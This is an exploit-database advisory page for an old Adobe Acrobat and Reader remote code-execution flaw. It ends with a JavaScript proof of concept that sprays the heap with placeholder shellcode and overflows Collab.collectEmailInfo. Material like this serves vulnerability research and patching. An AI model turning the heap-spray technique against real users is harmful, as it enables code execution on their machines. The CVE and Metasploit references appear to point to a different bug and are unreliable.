Adobe Acrobat and Reader Multiple Arbitrary Remote Code-Execution Vulnerabilities

vendor:

Acrobat and Reader

by:

SecurityFocus

9.3

CVSS

HIGH

Arbitrary Remote Code-Execution

119

CWE

Product Name: Acrobat and Reader

Affected Version From: Adobe Acrobat and Adobe Reader 8.1.2

Affected Version To: Prior versions

Patch Exists: YES

Related CWE: CVE-2008-2992

CPE: a:adobe:acrobat_reader

Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0974/, https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2008-2992/, https://www.rapid7.com/db/vulnerabilities/suse-cve-2008-2992/, https://www.rapid7.com/db/vulnerabilities/adobe-reader-apsb08-19-CVE-2008-2992/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2008

Adobe Acrobat and Reader Multiple Arbitrary Remote Code-Execution Vulnerabilities

Adobe Acrobat and Reader are prone to multiple arbitrary remote code-execution and security vulnerabilities. Attackers can exploit these issues to execute arbitrary code in the context of the user running the affected application. Other attacks are also possible. Versions prior to Adobe Acrobat and Adobe Reader 8.1.2 are vulnerable to these issues. The exploit code uses a heapspray technique to spray the heap with a shellcode and then uses the Collab.collectEmailInfo function to overwrite the return address of the function with the address of the shellcode.

Mitigation:

Users should upgrade to the latest version of Adobe Acrobat and Adobe Reader.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/27641/info

Adobe Acrobat and Reader are prone to multiple arbitrary remote code-execution and security vulnerabilities.

Attackers can exploit these issues to execute arbitrary code in the context of the user running the affected application. Other attacks are also possible.

Versions prior to Adobe Acrobat and Adobe Reader 8.1.2 are vulnerable to these issues. 

function repeat(count,what) {
   var v = "";
   while (--count >= 0) v += what;
   return v;
}
function heapspray(shellcode) {
   block='';
   fillblock = unescape("%u9090");
   while(block.length+20+shellcode.length<0x40000) 
      block = block+block+fillblock;
   arr = new Array();
   for (i=0;i<200;i++) arr[i]=block + shellcode;
}

heapspray(unescape(“%ucccc%ucccc”));
Collab.collectEmailInfo({
   msg:repeat(4096, unescape("%u0909%u0909"))});